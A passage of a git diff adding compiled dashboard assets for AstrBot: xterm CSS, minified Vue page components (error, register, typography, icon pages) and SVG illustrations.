* https://github.com/chjj/term.js
|
||||
* @license MIT
|
||||
*
|
||||
* Permission is hereby granted, free of charge, to any person obtaining a copy
|
||||
* of this software and associated documentation files (the "Software"), to deal
|
||||
* in the Software without restriction, including without limitation the rights
|
||||
* to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
|
||||
* copies of the Software, and to permit persons to whom the Software is
|
||||
* furnished to do so, subject to the following conditions:
|
||||
*
|
||||
* The above copyright notice and this permission notice shall be included in
|
||||
* all copies or substantial portions of the Software.
|
||||
*
|
||||
* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
|
||||
* IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
|
||||
* FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
|
||||
* AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
|
||||
* LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
|
||||
* OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
|
||||
* THE SOFTWARE.
|
||||
*
|
||||
* Originally forked from (with the author's permission):
|
||||
* Fabrice Bellard's javascript vt100 for jslinux:
|
||||
* http://bellard.org/jslinux/
|
||||
* Copyright (c) 2011 Fabrice Bellard
|
||||
* The original design remains. The terminal itself
|
||||
* has been extended to include xterm CSI codes, among
|
||||
* other features.
|
||||
*/.xterm{cursor:text;position:relative;user-select:none;-ms-user-select:none;-webkit-user-select:none}.xterm.focus,.xterm:focus{outline:none}.xterm .xterm-helpers{position:absolute;top:0;z-index:5}.xterm .xterm-helper-textarea{padding:0;border:0;margin:0;position:absolute;opacity:0;left:-9999em;top:0;width:0;height:0;z-index:-5;white-space:nowrap;overflow:hidden;resize:none}.xterm .composition-view{background:#000;color:#fff;display:none;position:absolute;white-space:nowrap;z-index:1}.xterm .composition-view.active{display:block}.xterm .xterm-viewport{background-color:#000;overflow-y:scroll;cursor:default;position:absolute;right:0;left:0;top:0;bottom:0}.xterm .xterm-screen{position:relative}.xterm .xterm-screen canvas{position:absolute;left:0;top:0}.xterm .xterm-scroll-area{visibility:hidden}.xterm-char-measure-element{display:inline-block;visibility:hidden;position:absolute;top:0;left:-9999em;line-height:normal}.xterm.enable-mouse-events{cursor:default}.xterm.xterm-cursor-pointer,.xterm .xterm-cursor-pointer{cursor:pointer}.xterm.column-select.focus{cursor:crosshair}.xterm .xterm-accessibility,.xterm .xterm-message{position:absolute;left:0;top:0;bottom:0;right:0;z-index:10;color:transparent;pointer-events:none}.xterm .live-region{position:absolute;left:-9999px;width:1px;height:1px;overflow:hidden}.xterm-dim{opacity:1!important}.xterm-underline-1{text-decoration:underline}.xterm-underline-2{text-decoration:double underline}.xterm-underline-3{text-decoration:wavy underline}.xterm-underline-4{text-decoration:dotted underline}.xterm-underline-5{text-decoration:dashed underline}.xterm-overline{text-decoration:overline}.xterm-overline.xterm-underline-1{text-decoration:overline underline}.xterm-overline.xterm-underline-2{text-decoration:overline double underline}.xterm-overline.xterm-underline-3{text-decoration:overline wavy underline}.xterm-overline.xterm-underline-4{text-decoration:overline dotted underline}.xterm-overline.xterm-underline-5{text-decoration:overline dashed underline}.xterm-strikethrough{text-decoration:line-through}.xterm-screen .xterm-decoration-container .xterm-decoration{z-index:6;position:absolute}.xterm-screen .xterm-decoration-container .xterm-decoration.xterm-decoration-top-layer{z-index:7}.xterm-decoration-overview-ruler{z-index:8;position:absolute;top:0;right:0;pointer-events:none}.xterm-decoration-top{z-index:2;position:relative}
|
||||
1
dashboard/dist/assets/DefaultDashboard-ece65639.js
vendored
Normal file
1
dashboard/dist/assets/Error404Page-11cf087a.css
vendored
Normal file
@@ -0,0 +1 @@
|
||||
.CardMediaWrapper{max-width:720px;margin:0 auto;position:relative}.CardMediaBuild{position:absolute;top:0;left:0;width:100%;animation:5s bounce ease-in-out infinite}.CardMediaParts{position:absolute;top:0;left:0;width:100%;animation:10s blink ease-in-out infinite}
|
||||
1
dashboard/dist/assets/Error404Page-5b9b1a3e.js
vendored
Normal file
@@ -0,0 +1 @@
|
||||
import{_ as t}from"./_plugin-vue_export-helper-c27b6911.js";import{o,c,w as s,V as i,a as r,b as e,d as l,e as a,f as d}from"./index-25639696.js";const n="/assets/img-error-bg-ab6474a0.svg",_="/assets/img-error-blue-2675a7a9.svg",m="/assets/img-error-text-a6aebfa0.svg",g="/assets/img-error-purple-edee3fbc.svg";const p={},u={class:"text-center"},f=e("div",{class:"CardMediaWrapper"},[e("img",{src:n,alt:"grid",class:"w-100"}),e("img",{src:_,alt:"grid",class:"CardMediaParts"}),e("img",{src:m,alt:"build",class:"CardMediaBuild"}),e("img",{src:g,alt:"build",class:"CardMediaBuild"})],-1),h=e("h1",{class:"text-h1"},"Something is wrong",-1),v=e("p",null,[e("small",null,[a("The page you are looking was moved, removed, "),e("br"),a("renamed, or might never exist! ")])],-1);function x(b,V){return o(),c(i,{"no-gutters":"",class:"h-100vh"},{default:s(()=>[r(d,{class:"d-flex align-center justify-center"},{default:s(()=>[e("div",u,[f,h,v,r(l,{variant:"flat",color:"primary",class:"mt-4",to:"/","prepend-icon":"mdi-home"},{default:s(()=>[a(" Home")]),_:1})])]),_:1})]),_:1})}const C=t(p,[["render",x]]);export{C as default};
|
||||
1
dashboard/dist/assets/ExtensionPage-0c929f20.js
vendored
Normal file
1
dashboard/dist/assets/FullLayout-18d94e89.js
vendored
Normal file
5
dashboard/dist/assets/LoginPage-2bd5ea03.js
vendored
Normal file
1
dashboard/dist/assets/LoginPage-74e85ca7.css
vendored
Normal file
@@ -0,0 +1 @@
|
||||
.custom-devider{border-color:#00000014!important}.googleBtn{border-color:#00000014;margin:30px 0 20px}.outlinedInput .v-field{border:1px solid rgba(0,0,0,.08);box-shadow:none}.orbtn{padding:2px 40px;border-color:#00000014;margin:20px 15px}.pwdInput{position:relative}.pwdInput .v-input__append{position:absolute;right:10px;top:50%;transform:translateY(-50%)}.loginForm .v-text-field .v-field--active input{font-weight:500}.loginBox{max-width:475px;margin:0 auto}
|
||||
1
dashboard/dist/assets/LogoDark.vue_vue_type_script_setup_true_lang-b1d2f1af.js
vendored
Normal file
@@ -0,0 +1 @@
|
||||
import{aw as _,x as d,D as n,o as c,s as m,a as f,w as p,Q as r,b as a,R as o,B as t,ax as h}from"./index-25639696.js";const s={Sidebar_drawer:!0,Customizer_drawer:!1,mini_sidebar:!1,fontTheme:"Roboto",inputBg:!1},l=_({id:"customizer",state:()=>({Sidebar_drawer:s.Sidebar_drawer,Customizer_drawer:s.Customizer_drawer,mini_sidebar:s.mini_sidebar,fontTheme:"Poppins",inputBg:s.inputBg}),getters:{},actions:{SET_SIDEBAR_DRAWER(){this.Sidebar_drawer=!this.Sidebar_drawer},SET_MINI_SIDEBAR(e){this.mini_sidebar=e},SET_FONT(e){this.fontTheme=e}}}),u={class:"logo",style:{display:"flex","align-items":"center"}},b={style:{"font-size":"24px","font-weight":"1000"}},w={style:{"font-size":"20px","font-weight":"1000"}},S={style:{"font-size":"20px"}},z=d({__name:"LogoDark",setup(e){n("rgb(var(--v-theme-primary))"),n("rgb(var(--v-theme-secondary))");const i=l();return(g,B)=>(c(),m("div",u,[f(t(h),{to:"/",style:{"text-decoration":"none",color:"black"}},{default:p(()=>[r(a("span",b,"AstrBot 仪表盘",512),[[o,!t(i).mini_sidebar]]),r(a("span",w,"Astr",512),[[o,t(i).mini_sidebar]]),r(a("span",S,"Bot",512),[[o,t(i).mini_sidebar]])]),_:1})]))}});export{z as _,l as u};
|
||||
1
dashboard/dist/assets/MaterialIcons-69a5e9aa.js
vendored
Normal file
@@ -0,0 +1 @@
|
||||
import{_ as o}from"./BaseBreadcrumb.vue_vue_type_style_index_0_lang-cae6d9fb.js";import{_ as i}from"./UiParentCard.vue_vue_type_script_setup_true_lang-b010c672.js";import{x as n,D as a,o as c,s as m,a as e,w as t,f as d,b as f,V as _,F as u}from"./index-25639696.js";const p=["innerHTML"],v=n({__name:"MaterialIcons",setup(b){const s=a({title:"Material Icons"}),r=a('<iframe src="https://materialdesignicons.com/" frameborder="0" width="100%" height="1000"></iframe>'),l=a([{title:"Icons",disabled:!1,href:"#"},{title:"Material Icons",disabled:!0,href:"#"}]);return(h,M)=>(c(),m(u,null,[e(o,{title:s.value.title,breadcrumbs:l.value},null,8,["title","breadcrumbs"]),e(_,null,{default:t(()=>[e(d,{cols:"12",md:"12"},{default:t(()=>[e(i,{title:"Material Icons"},{default:t(()=>[f("div",{innerHTML:r.value},null,8,p)]),_:1})]),_:1})]),_:1})],64))}});export{v as default};
|
||||
1
dashboard/dist/assets/RegisterPage-799ed804.css
vendored
Normal file
@@ -0,0 +1 @@
|
||||
.custom-devider{border-color:#00000014!important}.googleBtn{border-color:#00000014;margin:30px 0 20px}.outlinedInput .v-field{border:1px solid rgba(0,0,0,.08);box-shadow:none}.orbtn{padding:2px 40px;border-color:#00000014;margin:20px 15px}.pwdInput{position:relative}.pwdInput .v-input__append{position:absolute;right:10px;top:50%;transform:translateY(-50%)}.loginBox{max-width:475px;margin:0 auto}
|
||||
1
dashboard/dist/assets/RegisterPage-b4e7e679.js
vendored
Normal file
@@ -0,0 +1 @@
|
||||
import{_ as B}from"./LogoDark.vue_vue_type_script_setup_true_lang-b1d2f1af.js";import{x as y,D as o,o as b,s as U,a as e,w as a,b as n,B as $,d as u,f as d,A as _,e as f,V as r,O as m,aq as q,av as A,F as E,c as F,N as T,J as V,L as P}from"./index-25639696.js";const z="/assets/social-google-a359a253.svg",N=["src"],S=n("span",{class:"ml-2"},"Sign up with Google",-1),D=n("h5",{class:"text-h5 text-center my-4 mb-8"},"Sign up with Email address",-1),G={class:"d-sm-inline-flex align-center mt-2 mb-7 mb-sm-0 font-weight-bold"},L=n("a",{href:"#",class:"ml-1 text-lightText"},"Terms and Condition",-1),O={class:"mt-5 text-right"},j=y({__name:"AuthRegister",setup(w){const c=o(!1),i=o(!1),p=o(""),v=o(""),g=o(),h=o(""),x=o(""),k=o([s=>!!s||"Password is required",s=>s&&s.length<=10||"Password must be less than 10 characters"]),C=o([s=>!!s||"E-mail is required",s=>/.+@.+\..+/.test(s)||"E-mail must be valid"]);function R(){g.value.validate()}return(s,l)=>(b(),U(E,null,[e(u,{block:"",color:"primary",variant:"outlined",class:"text-lightText googleBtn"},{default:a(()=>[n("img",{src:$(z),alt:"google"},null,8,N),S]),_:1}),e(r,null,{default:a(()=>[e(d,{class:"d-flex align-center"},{default:a(()=>[e(_,{class:"custom-devider"}),e(u,{variant:"outlined",class:"orbtn",rounded:"md",size:"small"},{default:a(()=>[f("OR")]),_:1}),e(_,{class:"custom-devider"})]),_:1})]),_:1}),D,e(A,{ref_key:"Regform",ref:g,"lazy-validation":"",action:"/dashboards/analytical",class:"mt-7 loginForm"},{default:a(()=>[e(r,null,{default:a(()=>[e(d,{cols:"12",sm:"6"},{default:a(()=>[e(m,{modelValue:h.value,"onUpdate:modelValue":l[0]||(l[0]=t=>h.value=t),density:"comfortable","hide-details":"auto",variant:"outlined",color:"primary",label:"Firstname"},null,8,["modelValue"])]),_:1}),e(d,{cols:"12",sm:"6"},{default:a(()=>[e(m,{modelValue:x.value,"onUpdate:modelValue":l[1]||(l[1]=t=>x.value=t),density:"comfortable","hide-details":"auto",variant:"outlined",color:"primary",label:"Lastname"},null,8,["modelValue"])]),_:1})]),_:1}),e(m,{modelValue:v.value,"onUpdate:modelValue":l[2]||(l[2]=t=>v.value=t),rules:C.value,label:"Email Address / Username",class:"mt-4 mb-4",required:"",density:"comfortable","hide-details":"auto",variant:"outlined",color:"primary"},null,8,["modelValue","rules"]),e(m,{modelValue:p.value,"onUpdate:modelValue":l[3]||(l[3]=t=>p.value=t),rules:k.value,label:"Password",required:"",density:"comfortable",variant:"outlined",color:"primary","hide-details":"auto","append-icon":i.value?"mdi-eye":"mdi-eye-off",type:i.value?"text":"password","onClick:append":l[4]||(l[4]=t=>i.value=!i.value),class:"pwdInput"},null,8,["modelValue","rules","append-icon","type"]),n("div",G,[e(q,{modelValue:c.value,"onUpdate:modelValue":l[5]||(l[5]=t=>c.value=t),rules:[t=>!!t||"You must agree to continue!"],label:"Agree with?",required:"",color:"primary",class:"ms-n2","hide-details":""},null,8,["modelValue","rules"]),L]),e(u,{color:"secondary",block:"",class:"mt-2",variant:"flat",size:"large",onClick:l[6]||(l[6]=t=>R())},{default:a(()=>[f("Sign Up")]),_:1})]),_:1},512),n("div",O,[e(_),e(u,{variant:"plain",to:"/auth/login",class:"mt-2 text-capitalize mr-n2"},{default:a(()=>[f("Already have an account?")]),_:1})])],64))}});const I={class:"pa-7 pa-sm-12"},J=n("h2",{class:"text-secondary text-h2 mt-8"},"Sign up",-1),Y=n("h4",{class:"text-disabled text-h4 mt-3"},"Enter credentials to continue",-1),M=y({__name:"RegisterPage",setup(w){return(c,i)=>(b(),F(r,{class:"h-100vh","no-gutters":""},{default:a(()=>[e(d,{cols:"12",class:"d-flex align-center 
bg-lightprimary"},{default:a(()=>[e(T,null,{default:a(()=>[n("div",I,[e(r,{justify:"center"},{default:a(()=>[e(d,{cols:"12",lg:"10",xl:"6",md:"7"},{default:a(()=>[e(V,{elevation:"0",class:"loginBox"},{default:a(()=>[e(V,{variant:"outlined"},{default:a(()=>[e(P,{class:"pa-9"},{default:a(()=>[e(r,null,{default:a(()=>[e(d,{cols:"12",class:"text-center"},{default:a(()=>[e(B),J,Y]),_:1})]),_:1}),e(j)]),_:1})]),_:1})]),_:1})]),_:1})]),_:1})])]),_:1})]),_:1})]),_:1}))}});export{M as default};
|
||||
1
dashboard/dist/assets/ShadowPage-e7fd39fc.js
vendored
Normal file
@@ -0,0 +1 @@
|
||||
import{_ as c}from"./BaseBreadcrumb.vue_vue_type_style_index_0_lang-cae6d9fb.js";import{_ as f}from"./UiParentCard.vue_vue_type_script_setup_true_lang-b010c672.js";import{x as m,D as s,o as l,s as r,a as e,w as a,f as i,V as o,F as d,u as _,J as p,X as b,b as h,t as g}from"./index-25639696.js";const v=m({__name:"ShadowPage",setup(w){const n=s({title:"Shadow Page"}),u=s([{title:"Utilities",disabled:!1,href:"#"},{title:"Shadow",disabled:!0,href:"#"}]);return(V,x)=>(l(),r(d,null,[e(c,{title:n.value.title,breadcrumbs:u.value},null,8,["title","breadcrumbs"]),e(o,null,{default:a(()=>[e(i,{cols:"12",md:"12"},{default:a(()=>[e(f,{title:"Basic Shadow"},{default:a(()=>[e(o,{justify:"center"},{default:a(()=>[(l(),r(d,null,_(25,t=>e(i,{key:t,cols:"auto"},{default:a(()=>[e(p,{height:"100",width:"100",class:b(["mb-5",["d-flex justify-center align-center bg-primary",`elevation-${t}`]])},{default:a(()=>[h("div",null,g(t-1),1)]),_:2},1032,["class"])]),_:2},1024)),64))]),_:1})]),_:1})]),_:1})]),_:1})],64))}});export{v as default};
|
||||
1
dashboard/dist/assets/TablerIcons-eef884dc.js
vendored
Normal file
@@ -0,0 +1 @@
|
||||
import{_ as o}from"./BaseBreadcrumb.vue_vue_type_style_index_0_lang-cae6d9fb.js";import{_ as n}from"./UiParentCard.vue_vue_type_script_setup_true_lang-b010c672.js";import{x as c,D as a,o as i,s as m,a as e,w as t,f as d,b as f,V as _,F as u}from"./index-25639696.js";const b=["innerHTML"],w=c({__name:"TablerIcons",setup(p){const s=a({title:"Tabler Icons"}),r=a('<iframe src="https://tablericons.com/" frameborder="0" width="100%" height="600"></iframe>'),l=a([{title:"Icons",disabled:!1,href:"#"},{title:"Tabler Icons",disabled:!0,href:"#"}]);return(h,T)=>(i(),m(u,null,[e(o,{title:s.value.title,breadcrumbs:l.value},null,8,["title","breadcrumbs"]),e(_,null,{default:t(()=>[e(d,{cols:"12",md:"12"},{default:t(()=>[e(n,{title:"Tabler Icons"},{default:t(()=>[f("div",{innerHTML:r.value},null,8,b)]),_:1})]),_:1})]),_:1})],64))}});export{w as default};
|
||||
1
dashboard/dist/assets/TypographyPage-e6311caa.js
vendored
Normal file
@@ -0,0 +1 @@
|
||||
import{_ as m}from"./BaseBreadcrumb.vue_vue_type_style_index_0_lang-cae6d9fb.js";import{_ as v}from"./UiParentCard.vue_vue_type_script_setup_true_lang-b010c672.js";import{x as f,o as i,c as g,w as e,a,a8 as y,K as b,e as w,t as d,A as C,L as V,a9 as L,J as _,D as o,s as h,f as k,b as t,F as x,u as B,X as H,V as T}from"./index-25639696.js";const s=f({__name:"UiChildCard",props:{title:String},setup(r){const l=r;return(n,c)=>(i(),g(_,{variant:"outlined"},{default:e(()=>[a(y,{class:"py-3"},{default:e(()=>[a(b,{class:"text-h5"},{default:e(()=>[w(d(l.title),1)]),_:1})]),_:1}),a(C),a(V,null,{default:e(()=>[L(n.$slots,"default")]),_:3})]),_:3}))}}),D={class:"d-flex flex-column gap-1"},S={class:"text-caption pa-2 bg-lightprimary"},z=t("div",{class:"text-grey"},"Class",-1),N={class:"font-weight-medium"},$=t("div",null,[t("p",{class:"text-left"},"Left aligned on all viewport sizes."),t("p",{class:"text-center"},"Center aligned on all viewport sizes."),t("p",{class:"text-right"},"Right aligned on all viewport sizes."),t("p",{class:"text-sm-left"},"Left aligned on viewports SM (small) or wider."),t("p",{class:"text-right text-md-left"},"Left aligned on viewports MD (medium) or wider."),t("p",{class:"text-right text-lg-left"},"Left aligned on viewports LG (large) or wider."),t("p",{class:"text-right text-xl-left"},"Left aligned on viewports XL (extra-large) or wider.")],-1),M=t("div",{class:"d-flex justify-space-between flex-row"},[t("a",{href:"#",class:"text-decoration-none"},"Non-underlined link"),t("div",{class:"text-decoration-line-through"},"Line-through text"),t("div",{class:"text-decoration-overline"},"Overline text"),t("div",{class:"text-decoration-underline"},"Underline text")],-1),O=t("div",null,[t("p",{class:"text-high-emphasis"},"High-emphasis has an opacity of 87% in light theme and 100% in dark."),t("p",{class:"text-medium-emphasis"},"Medium-emphasis text and hint text have opacities of 60% in light theme and 70% in dark."),t("p",{class:"text-disabled"},"Disabled text has an opacity of 38% in light theme and 50% in dark.")],-1),j=f({__name:"TypographyPage",setup(r){const l=o({title:"Typography Page"}),n=o([["Heading 1","text-h1"],["Heading 2","text-h2"],["Heading 3","text-h3"],["Heading 4","text-h4"],["Heading 5","text-h5"],["Heading 6","text-h6"],["Subtitle 1","text-subtitle-1"],["Subtitle 2","text-subtitle-2"],["Body 1","text-body-1"],["Body 2","text-body-2"],["Button","text-button"],["Caption","text-caption"],["Overline","text-overline"]]),c=o([{title:"Utilities",disabled:!1,href:"#"},{title:"Typography",disabled:!0,href:"#"}]);return(U,F)=>(i(),h(x,null,[a(m,{title:l.value.title,breadcrumbs:c.value},null,8,["title","breadcrumbs"]),a(T,null,{default:e(()=>[a(k,{cols:"12",md:"12"},{default:e(()=>[a(v,{title:"Basic Typography"},{default:e(()=>[a(s,{title:"Heading"},{default:e(()=>[t("div",D,[(i(!0),h(x,null,B(n.value,([p,u])=>(i(),g(_,{variant:"outlined",key:p,class:"my-4"},{default:e(()=>[t("div",{class:H([u,"pa-2"])},d(p),3),t("div",S,[z,t("div",N,d(u),1)])]),_:2},1024))),128))])]),_:1}),a(s,{title:"Text-alignment",class:"mt-8"},{default:e(()=>[$]),_:1}),a(s,{title:"Decoration",class:"mt-8"},{default:e(()=>[M]),_:1}),a(s,{title:"Opacity",class:"mt-8"},{default:e(()=>[O]),_:1})]),_:1})]),_:1})]),_:1})],64))}});export{j as default};
|
||||
1
dashboard/dist/assets/UiParentCard.vue_vue_type_script_setup_true_lang-b010c672.js
vendored
Normal file
@@ -0,0 +1 @@
|
||||
import{x as n,o,c as i,w as e,a,a8 as d,b as c,K as u,e as p,t as _,a9 as s,A as f,L as V,J as m}from"./index-25639696.js";const C={class:"d-sm-flex align-center justify-space-between"},h=n({__name:"UiParentCard",props:{title:String},setup(l){const r=l;return(t,x)=>(o(),i(m,{variant:"outlined",elevation:"0",class:"withbg"},{default:e(()=>[a(d,null,{default:e(()=>[c("div",C,[a(u,null,{default:e(()=>[p(_(r.title),1)]),_:1}),s(t.$slots,"action")])]),_:3}),a(f),a(V,null,{default:e(()=>[s(t.$slots,"default")]),_:3})]),_:3}))}});export{h as _};
|
||||
1
dashboard/dist/assets/_plugin-vue_export-helper-c27b6911.js
vendored
Normal file
@@ -0,0 +1 @@
|
||||
const s=(t,r)=>{const o=t.__vccOpts||t;for(const[c,e]of r)o[c]=e;return o};export{s as _};
|
||||
34
dashboard/dist/assets/img-error-bg-ab6474a0.svg
vendored
Normal file
@@ -0,0 +1,34 @@
|
||||
<svg width="676" height="391" viewBox="0 0 676 391" fill="none" xmlns="http://www.w3.org/2000/svg">
|
||||
<g opacity="0.09">
|
||||
<line y1="-0.5" x2="390.089" y2="-0.5" transform="matrix(0.866041 -0.499972 -0.866041 -0.499972 4.49127 197.53)" stroke="black"/>
|
||||
<line y1="-0.5" x2="390.089" y2="-0.5" transform="matrix(-0.866041 -0.499972 -0.866041 0.499972 342.315 387.578)" stroke="black"/>
|
||||
<line y1="-0.5" x2="390.089" y2="-0.5" transform="matrix(0.866041 -0.499972 -0.866041 -0.499972 28.0057 211.105)" stroke="black"/>
|
||||
<line y1="-0.5" x2="390.089" y2="-0.5" transform="matrix(-0.866041 -0.499972 -0.866041 0.499972 365.829 374.002)" stroke="black"/>
|
||||
<line y1="-0.5" x2="390.089" y2="-0.5" transform="matrix(0.866041 -0.499972 -0.866041 -0.499972 51.52 224.68)" stroke="black"/>
|
||||
<line y1="-0.5" x2="390.089" y2="-0.5" transform="matrix(-0.866041 -0.499972 -0.866041 0.499972 389.344 360.428)" stroke="black"/>
|
||||
<line y1="-0.5" x2="390.089" y2="-0.5" transform="matrix(0.866041 -0.499972 -0.866041 -0.499972 75.0345 238.255)" stroke="black"/>
|
||||
<line y1="-0.5" x2="390.089" y2="-0.5" transform="matrix(-0.866041 -0.499972 -0.866041 0.499972 412.858 346.852)" stroke="black"/>
|
||||
<line y1="-0.5" x2="390.089" y2="-0.5" transform="matrix(0.866041 -0.499972 -0.866041 -0.499972 98.5488 251.83)" stroke="black"/>
|
||||
<line y1="-0.5" x2="390.089" y2="-0.5" transform="matrix(-0.866041 -0.499972 -0.866041 0.499972 436.372 333.277)" stroke="black"/>
|
||||
<line y1="-0.5" x2="390.089" y2="-0.5" transform="matrix(0.866041 -0.499972 -0.866041 -0.499972 122.063 265.405)" stroke="black"/>
|
||||
<line y1="-0.5" x2="390.089" y2="-0.5" transform="matrix(-0.866041 -0.499972 -0.866041 0.499972 459.887 319.703)" stroke="black"/>
|
||||
<line y1="-0.5" x2="390.089" y2="-0.5" transform="matrix(0.866041 -0.499972 -0.866041 -0.499972 145.578 278.979)" stroke="black"/>
|
||||
<line y1="-0.5" x2="390.089" y2="-0.5" transform="matrix(-0.866041 -0.499972 -0.866041 0.499972 483.401 306.127)" stroke="black"/>
|
||||
<line y1="-0.5" x2="390.089" y2="-0.5" transform="matrix(0.866041 -0.499972 -0.866041 -0.499972 169.092 292.556)" stroke="black"/>
|
||||
<line y1="-0.5" x2="390.089" y2="-0.5" transform="matrix(-0.866041 -0.499972 -0.866041 0.499972 506.916 292.551)" stroke="black"/>
|
||||
<line y1="-0.5" x2="390.089" y2="-0.5" transform="matrix(0.866041 -0.499972 -0.866041 -0.499972 192.597 306.127)" stroke="black"/>
|
||||
<line y1="-0.5" x2="390.089" y2="-0.5" transform="matrix(-0.866041 -0.499972 -0.866041 0.499972 530.43 278.977)" stroke="black"/>
|
||||
<line y1="-0.5" x2="390.089" y2="-0.5" transform="matrix(0.866041 -0.499972 -0.866041 -0.499972 216.111 319.703)" stroke="black"/>
|
||||
<line y1="-0.5" x2="390.089" y2="-0.5" transform="matrix(-0.866041 -0.499972 -0.866041 0.499972 553.944 265.402)" stroke="black"/>
|
||||
<line y1="-0.5" x2="390.089" y2="-0.5" transform="matrix(0.866041 -0.499972 -0.866041 -0.499972 239.626 333.277)" stroke="black"/>
|
||||
<line y1="-0.5" x2="390.089" y2="-0.5" transform="matrix(-0.866041 -0.499972 -0.866041 0.499972 577.459 251.827)" stroke="black"/>
|
||||
<path d="M263.231 346.905L601.064 151.871" stroke="black"/>
|
||||
<line y1="-0.5" x2="390.089" y2="-0.5" transform="matrix(-0.866041 -0.499972 -0.866041 0.499972 600.973 238.252)" stroke="black"/>
|
||||
<line y1="-0.5" x2="390.089" y2="-0.5" transform="matrix(0.866041 -0.499972 -0.866041 -0.499972 286.654 360.428)" stroke="black"/>
|
||||
<line y1="-0.5" x2="390.089" y2="-0.5" transform="matrix(-0.866041 -0.499972 -0.866041 0.499972 624.487 224.677)" stroke="black"/>
|
||||
<line y1="-0.5" x2="390.089" y2="-0.5" transform="matrix(0.866041 -0.499972 -0.866041 -0.499972 310.169 374.002)" stroke="black"/>
|
||||
<line y1="-0.5" x2="390.089" y2="-0.5" transform="matrix(-0.866041 -0.499972 -0.866041 0.499972 648.002 211.102)" stroke="black"/>
|
||||
<line y1="-0.5" x2="390.089" y2="-0.5" transform="matrix(0.866041 -0.499972 -0.866041 -0.499972 333.683 387.578)" stroke="black"/>
|
||||
<line y1="-0.5" x2="390.089" y2="-0.5" transform="matrix(-0.866041 -0.499972 -0.866041 0.499972 671.516 197.527)" stroke="black"/>
|
||||
</g>
|
||||
</svg>
|
||||
|
After Width: | Height: | Size: 3.9 KiB |
43
dashboard/dist/assets/img-error-blue-2675a7a9.svg
vendored
Normal file
@@ -0,0 +1,43 @@
|
||||
<svg width="676" height="395" viewBox="0 0 676 395" fill="none" xmlns="http://www.w3.org/2000/svg">
|
||||
<rect width="26.998" height="26.8293" transform="matrix(0.866041 -0.499972 0.866041 0.499972 361.873 290.126)" fill="#E3F2FD"/>
|
||||
<rect width="24.2748" height="24.1231" transform="matrix(0.866041 -0.499972 0.866041 0.499972 364.249 291.115)" fill="#90CAF9"/>
|
||||
<rect width="26.998" height="26.8293" transform="matrix(0.866041 -0.499972 0.866041 0.499972 291.67 86.4912)" fill="#E3F2FD"/>
|
||||
<rect width="24.2748" height="24.1231" transform="matrix(0.866041 -0.499972 0.866041 0.499972 294.046 87.48)" fill="#90CAF9"/>
|
||||
<g filter="url(#filter0_d)">
|
||||
<path d="M370.694 211.828L365.394 208.768V215.835L365.404 215.829C365.459 216.281 365.785 216.724 366.383 217.069L417.03 246.308C418.347 247.068 420.481 247.068 421.798 246.308L468.671 219.248C469.374 218.842 469.702 218.301 469.654 217.77V210.861L464.282 213.962L418.024 187.257C416.708 186.497 414.573 186.497 413.257 187.257L370.694 211.828Z" fill="url(#paint0_linear)"/>
|
||||
</g>
|
||||
<rect width="59.6284" height="63.9858" rx="5" transform="matrix(0.866041 -0.499972 0.866041 0.499972 364 208.812)" fill="#90CAF9"/>
|
||||
<rect width="59.6284" height="63.9858" rx="5" transform="matrix(0.866041 -0.499972 0.866041 0.499972 364 208.812)" fill="url(#paint1_linear)"/>
|
||||
<rect width="56.6816" height="60.8238" rx="5" transform="matrix(0.866041 -0.499972 0.866041 0.499972 366.645 208.761)" fill="url(#paint2_linear)"/>
|
||||
<path d="M421.238 206.161C421.238 206.434 421.62 206.655 422.092 206.655L432.159 206.656C435.164 206.656 437.6 208.063 437.601 209.798C437.602 211.533 435.166 212.939 432.162 212.938L422.09 212.937C421.62 212.937 421.24 213.157 421.24 213.428L421.241 215.814C421.241 216.087 421.624 216.308 422.096 216.308L432.689 216.309C438.917 216.31 443.967 213.395 443.965 209.799C443.964 206.202 438.914 203.286 432.684 203.286L422.086 203.284C421.617 203.284 421.236 203.504 421.237 203.775L421.238 206.161Z" fill="#1E88E5"/>
|
||||
<path d="M413.422 213.43C413.422 213.157 413.039 212.936 412.567 212.936L402.896 212.935C399.891 212.935 397.455 211.528 397.454 209.793C397.453 208.059 399.889 206.652 402.894 206.653L412.57 206.654C413.039 206.654 413.419 206.435 413.419 206.164L413.418 203.777C413.418 203.504 413.035 203.283 412.563 203.283L402.366 203.282C396.138 203.281 391.089 206.197 391.09 209.793C391.091 213.389 396.141 216.305 402.371 216.306L412.573 216.307C413.042 216.307 413.423 216.088 413.423 215.817L413.422 213.43Z" fill="#1E88E5"/>
|
||||
<path d="M407.999 198.145L411.211 201.235C411.266 201.288 411.332 201.336 411.405 201.379C411.813 201.614 412.461 201.669 412.979 201.49C413.59 201.278 413.787 200.821 413.421 200.469L410.209 197.379C409.843 197.027 409.051 196.913 408.441 197.124C407.831 197.335 407.633 197.793 407.999 198.145Z" fill="#1E88E5"/>
|
||||
<path d="M416.235 200.853C416.235 201.058 416.38 201.244 416.613 201.379C416.846 201.513 417.168 201.597 417.524 201.597C418.236 201.596 418.813 201.263 418.813 200.852L418.812 197.021C418.811 196.61 418.234 196.277 417.522 196.277C416.811 196.278 416.234 196.611 416.234 197.022L416.235 200.853Z" fill="#1E88E5"/>
|
||||
<path d="M421.627 200.47C421.317 200.769 421.412 201.143 421.82 201.379C421.893 201.421 421.977 201.459 422.069 201.491C422.68 201.703 423.472 201.588 423.838 201.236L427.047 198.147C427.413 197.794 427.215 197.337 426.605 197.126C425.994 196.915 425.203 197.029 424.836 197.381L421.627 200.47Z" fill="#1E88E5"/>
|
||||
<path d="M427.056 221.447L423.844 218.357C423.478 218.005 422.686 217.891 422.076 218.102C421.466 218.314 421.268 218.771 421.634 219.123L424.846 222.213C424.901 222.266 424.967 222.314 425.04 222.357C425.448 222.592 426.097 222.647 426.614 222.468C427.225 222.257 427.423 221.799 427.056 221.447Z" fill="#1E88E5"/>
|
||||
